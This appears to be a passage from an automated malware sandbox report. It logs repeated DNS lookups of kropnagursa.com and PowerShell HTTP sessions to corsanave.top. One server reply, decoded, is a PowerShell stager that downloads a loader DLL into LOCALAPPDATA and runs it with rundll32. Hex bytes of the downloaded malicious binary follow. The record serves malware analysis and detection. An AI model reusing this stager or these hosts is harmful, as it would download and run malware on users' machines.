                                                                                                                                            Feb 2, 2023 21:19:06.035361052 CET8.8.8.8192.168.2.40x295cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:06.646472931 CET8.8.8.8192.168.2.40xe8aeNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:07.136226892 CET8.8.8.8192.168.2.40x451bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:07.644517899 CET8.8.8.8192.168.2.40x380eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:08.403070927 CET8.8.8.8192.168.2.40x9f41No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:08.879096031 CET8.8.8.8192.168.2.40x508eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:09.348018885 CET8.8.8.8192.168.2.40xe470No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:09.832343102 CET8.8.8.8192.168.2.40xb54aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:10.321615934 CET8.8.8.8192.168.2.40x8bb4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:11.036003113 CET8.8.8.8192.168.2.40xc3aeNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:11.531223059 CET8.8.8.8192.168.2.40xa4c3No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:12.001198053 CET8.8.8.8192.168.2.40xdfe2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:12.488678932 CET8.8.8.8192.168.2.40x4c2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:12.973011971 CET8.8.8.8192.168.2.40x194cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:13.447926044 CET8.8.8.8192.168.2.40x4488No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:13.941353083 CET8.8.8.8192.168.2.40xc9d1No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:14.693547964 CET8.8.8.8192.168.2.40x2df9No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:15.457062960 CET8.8.8.8192.168.2.40x7f21No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:15.939611912 CET8.8.8.8192.168.2.40x11f8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:16.416594982 CET8.8.8.8192.168.2.40x136No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:16.906944036 CET8.8.8.8192.168.2.40x8157No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:17.512903929 CET8.8.8.8192.168.2.40x3157No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:17.989435911 CET8.8.8.8192.168.2.40x4841No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:19.091898918 CET8.8.8.8192.168.2.40x6556No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:19.758011103 CET8.8.8.8192.168.2.40xf64aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:20.238193989 CET8.8.8.8192.168.2.40xba28No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:21.012856960 CET8.8.8.8192.168.2.40xb8d6No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:21.487422943 CET8.8.8.8192.168.2.40xeacaNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:21.980477095 CET8.8.8.8192.168.2.40x8c3bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:22.460053921 CET8.8.8.8192.168.2.40x2771No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:23.306943893 CET8.8.8.8192.168.2.40x7debNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:23.791090965 CET8.8.8.8192.168.2.40xe64eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:24.279118061 CET8.8.8.8192.168.2.40x7c7fNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:24.844897032 CET8.8.8.8192.168.2.40x819No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:25.318572998 CET8.8.8.8192.168.2.40xd652No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:25.792546034 CET8.8.8.8192.168.2.40x4459No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:26.285401106 CET8.8.8.8192.168.2.40xb5daNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:26.761538982 CET8.8.8.8192.168.2.40x6e6aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:27.247343063 CET8.8.8.8192.168.2.40x61c7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:27.724530935 CET8.8.8.8192.168.2.40xc288No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:28.214098930 CET8.8.8.8192.168.2.40x71c3No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:29.301775932 CET8.8.8.8192.168.2.40x86ddNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:29.986756086 CET8.8.8.8192.168.2.40x2911No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:30.456887960 CET8.8.8.8192.168.2.40xd84bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:30.924612045 CET8.8.8.8192.168.2.40x78ffNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:31.400177956 CET8.8.8.8192.168.2.40xbd66No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:31.861154079 CET8.8.8.8192.168.2.40xd51aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:32.332925081 CET8.8.8.8192.168.2.40xbf08No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:32.822410107 CET8.8.8.8192.168.2.40x716fNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:33.284027100 CET8.8.8.8192.168.2.40xfe8eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:34.227726936 CET8.8.8.8192.168.2.40x7d38No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:34.709217072 CET8.8.8.8192.168.2.40x4b2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:35.422610998 CET8.8.8.8192.168.2.40xb610No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:35.943639040 CET8.8.8.8192.168.2.40xb9d1No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:36.410908937 CET8.8.8.8192.168.2.40x6395No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:36.896061897 CET8.8.8.8192.168.2.40xc051No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:37.377902031 CET8.8.8.8192.168.2.40x5fcbNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:38.081090927 CET8.8.8.8192.168.2.40xcc00No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:38.552761078 CET8.8.8.8192.168.2.40xf603No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:39.145114899 CET8.8.8.8192.168.2.40xb48eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:39.657099962 CET8.8.8.8192.168.2.40x150cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:40.134665012 CET8.8.8.8192.168.2.40x5411No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:40.613415956 CET8.8.8.8192.168.2.40x8ce8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:41.082745075 CET8.8.8.8192.168.2.40x1681No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:41.555470943 CET8.8.8.8192.168.2.40xb619No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:42.036590099 CET8.8.8.8192.168.2.40xa3f2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:42.700438976 CET8.8.8.8192.168.2.40x5e38No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:43.175517082 CET8.8.8.8192.168.2.40x65ddNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:43.650505066 CET8.8.8.8192.168.2.40xa195No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:44.151298046 CET8.8.8.8192.168.2.40xa8b8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:44.631617069 CET8.8.8.8192.168.2.40xd9d8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:45.130341053 CET8.8.8.8192.168.2.40xe8d9No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:45.616009951 CET8.8.8.8192.168.2.40x9265No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:46.224431992 CET8.8.8.8192.168.2.40x1b6fNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:46.701066971 CET8.8.8.8192.168.2.40x6cf8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:47.174391031 CET8.8.8.8192.168.2.40xdd4dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:47.657816887 CET8.8.8.8192.168.2.40xe36dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:48.131767035 CET8.8.8.8192.168.2.40xfe1bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:48.603256941 CET8.8.8.8192.168.2.40x34e9No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:49.686642885 CET8.8.8.8192.168.2.40xa39dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:50.410952091 CET8.8.8.8192.168.2.40xa5d2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:50.878942013 CET8.8.8.8192.168.2.40x8414No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:51.354249001 CET8.8.8.8192.168.2.40xf72bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:51.820861101 CET8.8.8.8192.168.2.40xca88No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:52.534813881 CET8.8.8.8192.168.2.40x4337No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:53.395939112 CET8.8.8.8192.168.2.40x2d77No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:54.234714985 CET8.8.8.8192.168.2.40xb055No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:54.713092089 CET8.8.8.8192.168.2.40xe2b9No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:55.571957111 CET8.8.8.8192.168.2.40x6ee7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:56.056992054 CET8.8.8.8192.168.2.40x696eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:56.742050886 CET8.8.8.8192.168.2.40x8bb4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:57.217751026 CET8.8.8.8192.168.2.40x936cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:58.067163944 CET8.8.8.8192.168.2.40xf169No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:58.922283888 CET8.8.8.8192.168.2.40xb304No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:59.731781960 CET8.8.8.8192.168.2.40x8367No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:00.198966980 CET8.8.8.8192.168.2.40x4f80No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:01.298454046 CET8.8.8.8192.168.2.40xaa95No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:01.773526907 CET8.8.8.8192.168.2.40x7a07No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:02.255429983 CET8.8.8.8192.168.2.40xb187No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:02.931781054 CET8.8.8.8192.168.2.40x2a68No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:03.401957989 CET8.8.8.8192.168.2.40xa814No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:04.088618994 CET8.8.8.8192.168.2.40x1172No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:04.567712069 CET8.8.8.8192.168.2.40x3ed5No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:05.719261885 CET8.8.8.8192.168.2.40x4a3aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:06.199726105 CET8.8.8.8192.168.2.40x42c8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:07.018198967 CET8.8.8.8192.168.2.40xbc2dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • corsanave.top
                                                                                                                                            • kropnagursa.com

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.44969646.151.26.13180C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:16:55.358319044 CET434OUTGET /gatef.php HTTP/1.1
                                                                                                                                            Host: corsanave.top
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Feb 2, 2023 21:16:56.150391102 CET434INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:16:56 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Content-Length: 222
                                                                                                                                            Connection: close
                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                            Data Raw: 24 70 61 74 68 20 3d 20 24 45 6e 76 3a 4c 4f 43 41 4c 41 50 50 44 41 54 41 2b 27 5c 4d 5a 76 59 6e 67 2e 62 69 6e 27 3b 20 24 63 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 24 63 6c 69 65 6e 74 2e 64 6f 77 6e 6c 6f 61 64 66 69 6c 65 28 27 68 74 74 70 3a 2f 2f 63 6f 72 73 61 6e 61 76 65 2e 74 6f 70 2f 64 6c 6c 2f 6c 6f 61 64 65 72 5f 70 32 5f 64 6c 6c 5f 36 34 5f 6e 31 5f 78 36 34 5f 69 6e 66 2e 64 6c 6c 33 36 2e 64 6c 6c 27 2c 24 70 61 74 68 29 3b 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 33 32 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 24 70 61 74 68 2c 69 6e 69 74 20
                                                                                                                                            Data Ascii: $path = $Env:LOCALAPPDATA+'\MZvYng.bin'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://corsanave.top/dll/loader_p2_dll_64_n1_x64_inf.dll36.dll',$path); C:\Windows\System32\rundll32.exe $path,init


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.44969746.151.26.13180C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:16:56.489515066 CET435OUTGET /dll/loader_p2_dll_64_n1_x64_inf.dll36.dll HTTP/1.1
                                                                                                                                            Host: corsanave.top
                                                                                                                                            Feb 2, 2023 21:16:56.520250082 CET436INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:16:56 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 1597952
                                                                                                                                            Connection: close
                                                                                                                                            Last-Modified: Thu, 02 Feb 2023 11:21:46 GMT
                                                                                                                                            ETag: "186200-5f3b5c5294680"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d6 11 00 00 50 06 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 18 00 00 04 00 00 9d 5f 19 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 50 c8 15 00 34 50 00 00 84 18 16 00 40 01 00 00 00 90 18 00 a0 06 00 00 00 00 18 00 28 77 00 00 00 00 00 00 00 00 00 00 00 a0 18 00 44 1b 00 00 00 a0 17 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 71 13 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 21 16 00 e0 07 00 00 28 c2 15 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 27 d5 11 00 00 10 00 00 00 d6 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc aa 05 00 00 f0 11 00 00 ac 05 00 00 da 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 75 69 6c 64 69 64 89 00 00 00 00 a0 17 00 00 02 00 00 00 86 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 47 00 00 00 b0 17 00 00 04 00 00 00 88 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 77 00 00 00 00 18 00 00 78 00 00 00 8c 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 28 00 00 00 00 80 18 00 00 02 00 00 00 04 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6b 35 00 00 00 90 18 00 00 40 00 00 00 06 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 44 1b 00 00 00 d0 18 00 00 1c 00 00 00 46 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8d 0d 09 a4 17 00 e9 44
                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd" P_`P4P@(wDhq(!(.text' `.rdata@@.buildid@@.dataG@.pdata(wx@@.tls(@.rsrck5@@@.relocDF@BHD
                                                                                                                                            Feb 2, 2023 21:16:56.520281076 CET437INData Raw: c4 11 00 0f 1f 40 00 41 57 41 56 41 54 56 57 55 53 48 83 ec 20 41 bc 01 00 00 00 83 fa 01 0f 84 81 00 00 00 85 d2 0f 85 59 01 00 00 8b 05 cd a3 17 00 85 c0 0f 8e 3c 01 00 00 83 c0 ff 89 05 bc a3 17 00 48 8b 35 c5 df 11 00 bf 01 00 00 00 31 c0 f0
                                                                                                                                            Data Ascii: @AWAVATVWUSH AY<H51H>tH1H>uH=Hw1HMIeH%0HpH=P1H7t$H9tH-P1H7tH9uH5!
                                                                                                                                            Feb 2, 2023 21:16:56.520301104 CET439INData Raw: c6 05 d3 b6 17 00 00 45 31 db 44 88 1d ca b6 17 00 41 c1 ea 19 41 80 e2 01 44 88 15 b9 b6 17 00 31 d2 41 81 f8 07 00 00 80 72 15 b8 07 00 00 80 31 c9 4c 87 c3 0f a2 4c 87 c3 c1 ea 08 80 e2 01 88 15 9b b6 17 00 c3 cc cc cc cc cc cc cc cc cc cc b8
                                                                                                                                            Data Ascii: E1DAAD1Ar1LLAWAVAUATVWUSHDL$'IIIBHD$`HT$XDJH@LHD$HH@0HD$hLHLD$pILT$(HL$@H\$PL\$8HALCK
                                                                                                                                            Feb 2, 2023 21:16:56.520320892 CET440INData Raw: 00 e0 0f 00 48 0f 43 fe 4c 8b 25 84 0e 16 00 66 2e 0f 1f 84 00 00 00 00 00 66 90 48 89 d9 48 89 fa 41 b8 00 40 00 00 41 ff d4 85 c0 74 43 48 01 fb 48 29 fe 48 81 fe 00 00 10 00 bf 00 00 10 00 48 0f 42 fe 48 85 f6 75 d2 49 83 46 48 03 49 81 c6 90
                                                                                                                                            Data Ascii: HCL%f.fHHA@AtCHH)HHBHuIFHIIhLLH([_^A\A^A_HHH%iVWH(HHHAhHtRHxt&HH`HHGhHHH)HHH)OHHA;o
                                                                                                                                            Feb 2, 2023 21:16:56.520340919 CET441INData Raw: 00 48 8b 47 20 48 89 43 20 48 8b 47 28 48 01 43 28 8b 43 30 3b 47 30 74 07 c7 43 30 04 00 00 00 48 8d 0d 3e a3 17 00 48 89 da e8 56 49 00 00 f0 4c 01 3d 36 a3 17 00 48 8d 0d af a2 17 00 ff 15 31 08 16 00 4c 89 f1 ff 15 28 07 16 00 48 8b 05 19 ac
                                                                                                                                            Data Ascii: HG HC HG(HC(C0;G0tC0H>HVIL=6H1L(HHH=LHMeH53HHIEL-H(t$ H8[]_^A\A]A^A_H%HHCH%iAWAVAUATVWUSH
                                                                                                                                            Feb 2, 2023 21:16:56.520361900 CET443INData Raw: 5c 41 5d 41 5e 41 5f c3 48 89 c7 48 8b 47 20 49 8d 0c 07 48 83 c1 ff 4d 89 fd 49 f7 dd 49 21 cd 4c 89 ed 48 29 c5 48 29 eb 8b 47 30 4d 85 e4 74 08 83 f8 01 41 0f 94 04 24 89 44 24 2c 48 81 c3 00 00 f0 ff 48 8d 0d 14 9e 17 00 48 89 fa e8 cc 3b 00
                                                                                                                                            Data Ascii: \A]A^A_HHG IHMII!LH)H)G0MtA$D$,HHH;HH]GHtjHo(HHDHnHoHHNHH=HtZHHHdHulH-HH5
                                                                                                                                            Feb 2, 2023 21:16:56.520382881 CET444INData Raw: b9 02 00 00 48 83 e1 fc 4a 8d 04 e7 48 83 c0 78 31 d2 0f 1f 80 00 00 00 00 48 c7 40 b8 08 00 00 00 48 c7 40 d0 08 00 00 00 48 c7 40 e8 08 00 00 00 48 c7 00 08 00 00 00 48 83 c2 04 48 83 c0 60 48 39 d1 75 d4 4d 85 c0 74 30 48 01 f2 48 8d 04 52 48
                                                                                                                                            Data Ascii: HJHx1H@H@H@HHH`H9uMt0HHRHH0IK@1fDHHH9uHGHuIN`HHGHHGIIE%HIEHHmHHLHHLHw[Hl0@uPHH H
